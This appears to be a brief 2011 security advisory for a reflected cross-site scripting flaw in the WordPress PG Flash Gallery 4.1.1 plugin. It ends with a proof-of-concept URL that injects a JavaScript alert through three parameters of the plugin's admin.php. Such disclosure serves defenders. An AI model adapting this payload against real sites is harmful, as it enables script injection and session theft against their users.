WordPress PG Flash Gallery version 4.1.1 suffers from a cross site scripting vulnerability.
3f427ed1d7171406cb2b3371554f6c371a26c729c20e3faf5bff54c723bec636
------------------------------------------------------------------------
Software................WordPress PG Flash Gallery 4.1.1
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.photo-graffix.com/wordpress_plugin.php
Release Date............2/23/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress PG Flash
Gallery 4.1.1 can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/pg-flash-gallery/gallery/install/admin.php?album=%22;alert(0);//&img=%22;alert(0);//&xtras=%22;alert(0);//